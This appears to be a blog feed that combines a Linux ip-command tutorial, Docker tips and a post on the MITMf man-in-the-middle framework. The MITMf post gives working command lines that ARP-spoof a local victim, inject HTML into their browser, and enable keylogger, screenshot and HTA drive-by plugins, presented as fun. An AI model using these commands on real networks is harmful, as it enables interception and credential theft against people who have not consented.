</code></pre> <p><img src="http://www.googlinux.com/content/images/2016/09/Screenshot-2016-09-02-07-53-33.png" alt="OpenStack: Launching an instance on a specific compute host"></p> <p>Happy Cloud Computing :)</p> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>IP command from IPROUTE2<blockquote> <p><em>The <code>ip</code> command in Linux is used to show / manipulate routing, devices, policy routing, and tunnels. It is provided by the <code>iproute2</code> package. The <code>ifconfig</code> command, provided by the <code>net-tools</code> package, has been around for a long time and will stay around, but <code>ip</code> is more powerful and modern and will eventually replace it.</em></p></blockquote>http://www.googlinux.com/ip-command-from-iproute/59584986-3937-4f3d-b84a-d373f328c3d2LinuxSwapnil JainFri, 26 Aug 2016 04:00:00 GMT<blockquote> <img src="http://www.googlinux.com/content/images/2016/08/ip-address-900x300.jpg" alt="IP command from IPROUTE2"><p><em>The <code>ip</code> command in Linux is used to show / manipulate routing, devices, policy routing, and tunnels. It is provided by the <code>iproute2</code> package. The <code>ifconfig</code> command, provided by the <code>net-tools</code> package, has been around for a long time and will stay around, but <code>ip</code> is more powerful and modern and will eventually replace it. This blog shows some examples and powerful uses of the <code>ip</code> command.</em></p> </blockquote>
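<p>Since <code>ip</code> is positioned here as the successor to <code>ifconfig</code>, a quick (non-exhaustive) mapping of common <code>net-tools</code> commands to their <code>iproute2</code> equivalents may help; the device name <code>eth0</code> is just an example:</p> <pre><code>ifconfig            # ip addr
ifconfig eth0 up    # ip link set eth0 up
route -n            # ip route
arp -n              # ip neigh
netstat -g          # ip maddr
</code></pre>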
<h1 id="ipqueries">IP QUERIES</h1> <h4 id="displayipaddressesandpropertyinformation">Display IP Addresses and property information</h4> <p>Show information for all addresses</p> <pre><code>root@bcf62d10644f:~# ip addr
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.3/16 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:acff:fe11:3/64 scope link
       valid_lft forever preferred_lft forever
</code></pre> <p>Display information only for device eth0</p> <pre><code>root@bcf62d10644f:~# ip addr show dev eth0
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.3/16 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:acff:fe11:3/64 scope link
       valid_lft forever preferred_lft forever
</code></pre> <h4 id="manageanddisplaythestateofallnetworkinterfaces">Manage and display the state of all network interfaces</h4> <p>Show information for all interfaces</p> <pre><code>root@bcf62d10644f:~# ip link
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default
    link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
</code></pre> <p>Display information only for device eth0</p> <pre><code>root@bcf62d10644f:~# ip link show dev eth0
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default
    link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
</code></pre> <p>Display interface statistics</p> <pre><code>root@bcf62d10644f:~# ip -s link
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    RX: bytes  packets  errors  dropped overrun mcast
    0          0        0       0       0       0
    TX: bytes  packets  errors  dropped carrier collsns
    0          0        0       0       0       0
2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default
    link/ether 02:42:ac:11:00:03 brd ff:ff:ff:ff:ff:ff
    RX: bytes  packets  errors  dropped overrun mcast
    648        8        0       0       0       0
    TX: bytes  packets  errors  dropped carrier collsns
    648        8        0       0       0       0
</code></pre> <h4 id="displayandaltertheroutingtable">Display and alter the routing table</h4> <p>List all of the route entries in the kernel</p> <pre><code>root@bcf62d10644f:~# ip route
default via 172.17.0.1 dev eth0
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.3
</code></pre> <h4 id="manageanddisplaymulticastipaddresses">Manage and display multicast IP addresses</h4> <p>Display multicast information for all devices</p> <pre><code>root@bcf62d10644f:~# ip maddr
1:  lo
    inet  224.0.0.1
    inet6 ff02::1
    inet6 ff01::1
2:  eth0
    link  33:33:00:00:00:01
    link  01:00:5e:00:00:01
    link  33:33:ff:11:00:03
    inet  224.0.0.1
    inet6 ff02::1:ff11:3
    inet6 ff02::1
    inet6 ff01::1
</code></pre> <p>Display multicast information for device eth0</p> <pre><code>ip maddr show dev eth0
</code></pre>
<h4 id="showneighbourobjectsalsoknownasthearptableforipv4">Show neighbour objects; also known as the ARP table for IPv4</h4> <p>Display neighbour objects</p> <pre><code>ip neigh
</code></pre> <p>Show the ARP cache for device em1</p> <pre><code>ip neigh show dev em1
</code></pre> <h1 id="modifyingaddressandlinkproperties">MODIFYING ADDRESS AND LINK PROPERTIES</h1> <h4 id="addanaddress">Add an address</h4> <p>Add address 192.168.1.1 with netmask 24 to device em1</p> <pre><code>ip addr add 192.168.1.1/24 dev em1
</code></pre> <h4 id="deleteanaddress">Delete an address</h4> <p>Remove address 192.168.1.1/24 from device em1</p> <pre><code>ip addr del 192.168.1.1/24 dev em1
</code></pre> <h4 id="alterthestatusoftheinterface">Alter the status of the interface</h4> <p>Bring em1 online</p> <pre><code>ip link set em1 up
</code></pre> <p>Bring em1 offline</p> <pre><code>ip link set em1 down
</code></pre> <p>Set the MTU on em1 to 9000</p> <pre><code>ip link set em1 mtu 9000
</code></pre> <p>Enable promiscuous mode for em1</p> <pre><code>ip link set em1 promisc on
</code></pre> <h1 id="adjustingandviewingroutes">ADJUSTING AND VIEWING ROUTES</h1> <h4 id="addanentrytotheroutingtable">Add an entry to the routing table</h4> <p>Add a default route (for all addresses) via the local gateway 192.168.1.1 that can be reached on device em1</p> <pre><code>ip route add default via 192.168.1.1 dev em1
</code></pre> <p>Add a route to 192.168.1.0/24 via the gateway at 192.168.1.1</p> <pre><code>ip route add 192.168.1.0/24 via 192.168.1.1
</code></pre> <p>Add a route to 192.168.1.0/24 that can be reached on device em1</p> <pre><code>ip route add 192.168.1.0/24 dev em1
</code></pre> <h4 id="deletearoutingtableentry">Delete a routing table entry</h4> <p>Delete the route for 192.168.1.0/24 via the gateway at 192.168.1.1</p> <pre><code>ip route delete 192.168.1.0/24 via 192.168.1.1
</code></pre> <h4 id="replaceoraddifnotdefinedaroute">Replace, or add if not defined, a route</h4> <p>Replace the defined route for 192.168.1.0/24 to use device em1</p> <pre><code>ip route replace 192.168.1.0/24 dev em1
</code></pre> <h4 id="displaytherouteanaddresswilltake">Display the route an address will take</h4> <p>Display the route taken for IP 192.168.1.5</p> <pre><code>ip route get 192.168.1.5
</code></pre> <h1 id="managingthearptable">MANAGING THE ARP TABLE</h1> <h4 id="addanentrytothearptable">Add an entry to the ARP Table</h4> <p>Add address 192.168.1.1 with MAC 1:2:3:4:5:6 to em1</p> <pre><code>ip neigh add 192.168.1.1 lladdr 1:2:3:4:5:6 dev em1
</code></pre> <h4 id="invalidateanentry">Invalidate an entry</h4> <p>Invalidate the entry for 192.168.1.1 on em1</p> <pre><code>ip neigh del 192.168.1.1 dev em1
</code></pre> <h4 id="replaceoraddsifnotdefinedanentrytothearptable">Replace, or add if not defined, an entry in the ARP table</h4> <p>Replace the entry for address 192.168.1.1 to use MAC 1:2:3:4:5:6 on em1</p> <pre><code>ip neigh replace 192.168.1.1 lladdr 1:2:3:4:5:6 dev em1
</code></pre>
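<p>Two closing conveniences that fit the examples above (same hypothetical device <code>em1</code>); note that, like everything done with <code>ip</code>, these only change the kernel's running state and do not persist across a reboot:</p> <pre><code># Remove every address configured on em1 in one step
ip addr flush dev em1

# Restrict any of the show commands to one address family, e.g. IPv4 only
ip -4 addr show dev em1
</code></pre>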
<hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Man-In-The-Middle Attack Framework: MITMf<p><code>MITMf</code> is a Framework for Man-In-The-Middle attacks. <code>MITMf</code> aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.</p> <p>Originally built to address the significant shortcomings of other tools (e.g. <code>Ettercap</code>, <code>Mallory</code>), it's been almost completely re-written from scratch to provide a</p>http://www.googlinux.com/man-in-the-middle-attack-framework-mitmf/a759e34a-01f8-469d-af71-91da07596952Cyber SecurityHarsh KhandelwalThu, 25 Aug 2016 12:06:41 GMT<img src="http://www.googlinux.com/content/images/2016/08/pic.jpg" alt="Man-In-The-Middle Attack Framework: MITMf"><p><code>MITMf</code> is a Framework for Man-In-The-Middle attacks. <code>MITMf</code> aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.</p> <p>Originally built to address the significant shortcomings of other tools (e.g. <code>Ettercap</code>, <code>Mallory</code>), it has been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.</p> <p><code>MITMf</code> is available with <a href="http://www.kali.org">Kali Linux</a>. It can also be installed on any flavour of Linux. To install MITMf, kindly follow the process available at <a href="https://github.com/byt3bl33d3r/MITMf/wiki/Installation">https://github.com/byt3bl33d3r/MITMf/wiki/Installation</a></p> <p><code>MITMf</code> is a simple-to-use command line attack tool. This article presents some examples which can be real fun ;). Use it at your own risk.</p> <h3 id="injecthtmlpageinvictimsbrowser">Inject an HTML page into the victim's browser</h3> <p>Create an index.html in your root folder and ...</p> <pre><code>root@debian:~# cd /usr/share/mitmf/
root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --inject --html-file /root/index.html
</code></pre> <p>The above example injects this index.html into the victim's (192.168.1.9 in this example) browser whenever they view an http (not https) website.</p> <ul> <li><code>-i</code> is for the interface (wlan0 in this example)</li> <li><code>--spoof</code> Loads plugin 'Spoof'</li> <li><code>--arp</code> Redirect traffic using ARP spoofing</li> <li><code>--gateway GATEWAY</code> Specify the gateway IP on your network</li> <li><code>--targets TARGETS</code> Specify host/s to poison [if omitted will default to subnet]</li> <li><code>--inject</code> Load plugin 'Inject' to inject index.html</li> </ul> <blockquote> <p><strong>Note:</strong> The <mark>ARP spoof attack</mark> intercepts the traffic between the gateway (or router) and the target (192.168.1.9). All traffic that's going from the victim to the gateway now passes through the attacker's system.</p> </blockquote>
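<p>A quick, hedged way to see the poisoning from the victim's side (addresses as in the example above): compare the MAC address the victim holds for the gateway before and during the attack.</p> <pre><code># On the victim (192.168.1.9): the entry for the gateway normally shows the router's MAC
ip neigh show 192.168.1.1

# During the ARP spoof the same entry silently switches to the attacker's MAC
arp -n
</code></pre>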
<h3 id="makeimageslookupsidedown">Make images look upside-down</h3> <p>This is real fun: whatever http websites the victim is viewing, all images appearing on the pages will be flipped 180 degrees.</p> <pre><code>root@debian:/usr/share/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.8.1 --target 192.168.8.100 --upsidedownternet
</code></pre> <h3 id="replaceimagesimagerandomiser">Replace images (Image Randomiser)</h3> <p>The Image Randomiser MITMf plugin replaces images in the victim's browser with a random one from a specified directory (<code>/root/Pictures/</code> in this example).</p> <pre><code>root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --imgrand --img-dir /root/Pictures/
</code></pre> <h3 id="otherplugins">Other Plugins</h3> <p>There are many other plugins available with <code>MITMf</code> that you can play with.</p> <ul> <li>Take a screenshot of the victim's browser</li> </ul> <pre><code>ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a client's browser
--screen             Load plugin 'ScreenShotter'
--interval SECONDS   Interval at which screenshots will be taken (default 10 seconds)
</code></pre> <ul> <li>Inject a JavaScript keylogger into the victim's webpages</li> </ul> <pre><code>--jskeylogger        Load plugin 'JSKeylogger'
</code></pre> <ul> <li>Perform HTA drive-by attacks on the victim</li> </ul> <pre><code>--hta                Load plugin 'HTA Drive-By'
--text TEXT          Text to display on the notification bar
--hta-app HTA_APP    Path to HTA application [defaults to config/hta_driveby/flash_setup.hta]
</code></pre> <p><strong><em>Have fun, be safe :)</em></strong></p> <blockquote> <h1 id="disclaimer">Disclaimer</h1> <p><em>Any actions and/or activities related to the material contained within this website are solely your responsibility. Misuse of the information on this website can result in criminal charges being brought against the persons in question. The authors and <a href="http://googlinux.com">http://googlinux.com</a> will not be held responsible in the event any criminal charges are brought against any individuals misusing the information on this website to break the law.</em></p> <p><em>This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GET OUT OF HERE! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here; if this is your intention, then LEAVE NOW! Neither the administration of this server, the authors of this material, nor anyone else affiliated in any way is going to accept responsibility for your actions. Neither the creator nor GoogLinux is responsible for the comments posted on this website.</em></p> </blockquote> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>How to list all tags of a docker image<h3 id="dockersearch">Docker Search</h3> <p>To search for an image on the Docker remote registry you can use the <code>docker search</code> command.</p> <p><mark>Example:</mark></p> <pre><code>root@googlinux.com:~# docker search ubuntu
NAME                       DESCRIPTION                                     STARS   OFFICIAL   AUTOMATED
ubuntu                     Ubuntu is a Debian-based Linux operating s...   4482    [OK]
ubuntu-upstart             Upstart is an event-based replacement for ...   65      [OK]
rastasheep/ubuntu-sshd     Dockerized</code></pre>http://www.googlinux.com/list-all-tags-of-docker-image/5495aef8-29e9-4e0e-8de6-86488bb72053DockerSwapnil JainFri, 19 Aug 2016 02:28:00 GMT<h3 id="dockersearch">Docker Search</h3> <img src="http://www.googlinux.com/content/images/2016/08/dockerbanner.jpg" alt="How to list all tags of a docker image"><p>To search for an image on the Docker remote registry you can use the <code>docker search</code> command.</p> <p><mark>Example:</mark></p> <pre><code>root@googlinux.com:~# docker search ubuntu
NAME                       DESCRIPTION                                     STARS   OFFICIAL   AUTOMATED
ubuntu                     Ubuntu is a Debian-based Linux operating s...   4482    [OK]
ubuntu-upstart             Upstart is an event-based replacement for ...   65      [OK]
rastasheep/ubuntu-sshd     Dockerized SSH service, built on top of of...   32                 [OK]
torusware/speedus-ubuntu   Always updated official Ubuntu docker imag...   27                 [OK]
</code></pre> <p>This example displays images with a name containing <code>ubuntu</code>. The first column displays the name of the image. You may notice that <code>rastasheep/ubuntu-sshd</code> has a <code>/</code> in the name: the left portion, i.e. <code>rastasheep</code>, is the username, and the right portion, i.e. <code>ubuntu-sshd</code>, is the image name. Some images do not have a <code>/</code> in the name, just like the first one, i.e. <code>ubuntu</code>; in this case <code>library</code> is the username.</p> <blockquote> <p><strong>Note:</strong> Search queries will only return up to 25 results. You can use the <code>--limit</code> option to change the search result display limit.</p> </blockquote> <h3 id="dockerpull">Docker pull</h3> <p><code>docker pull</code> is the command to pull a docker image from the remote registry.</p> <pre><code>root@googlinux.com:~# docker pull debian
Using default tag: latest
latest: Pulling from library/debian
</code></pre> <p>This will try to pull the image with the <mark>latest</mark> tag.</p> <h3 id="listfirst10tags">List first 10 tags</h3> <p>Listing all the available tags can be tricky. That information is always available on the image's info page on hub.docker.com, but there are lots of cases where you may need it on the command line. This can be done using a simple API call and parsing the <code>json</code> output with the <code>jq</code> tool.</p> <pre><code>root@googlinux.com:~# curl 'https://registry.hub.docker.com/v2/repositories/library/debian/tags/'|jq '."results"[]["name"]'
"7.11"
"testing"
"oldstable-backports"
"oldstable"
"8"
"8.5"
"stretch"
"experimental"
"rc-buggy"
"wheezy-backports"
</code></pre> <blockquote> <p><strong>Note:</strong> <code>jq</code> is a tool for processing JSON inputs. <code>jq</code> is like <code>sed</code> for JSON data - you can use it to slice and filter and map and transform structured data with the same ease that <code>sed</code>, <code>awk</code>, <code>grep</code> and friends let you play with text.</p> </blockquote> <h3 id="ascripttolistalltags">A script to List all Tags</h3> <pre><code># Walk the paginated API; the loop ends when jq fails on a page with no "results"
i=0
while [ $? == 0 ]
do
  i=$((i+1))
  curl https://registry.hub.docker.com/v2/repositories/library/debian/tags/?page=$i 2&gt;/dev/null|jq '."results"[]["name"]'
done
</code></pre>
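<p>As an aside: if the registry honours the <code>page_size</code> query parameter (Docker Hub's v2 API did at the time of writing; treat this as an assumption), the loop above can often be replaced by a single call:</p> <pre><code># Fetch up to 100 tags in one request instead of paging
curl -s 'https://registry.hub.docker.com/v2/repositories/library/debian/tags/?page_size=100' | jq '."results"[]["name"]'
</code></pre>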
<a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>How to update all docker images<p>Docker does not have a command to update images that you have already pulled. The only way is to pull all images again using <code>docker pull &lt;image&gt;</code> command. This simple one-liner can help you update all images at once.</p> <pre><code>docker images |grep -v REPOSITORY|awk '{print $1}</code></pre>http://www.googlinux.com/update-all-docker-images/1347f1dd-7caf-445a-a233-36074cbd53c7DockerSwapnil JainThu, 18 Aug 2016 05:26:01 GMT<img src="http://www.googlinux.com/content/images/2016/08/dockerbanner-2.jpg" alt="How to update all docker images"><p>Docker does not have a command to update images that you have already pulled. The only way is to pull all images again using <code>docker pull &lt;image&gt;</code> command. This simple one-liner can help you update all images at once.</p> <pre><code>docker images |grep -v REPOSITORY|awk '{print $1}'|xargs -L1 docker pull </code></pre> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>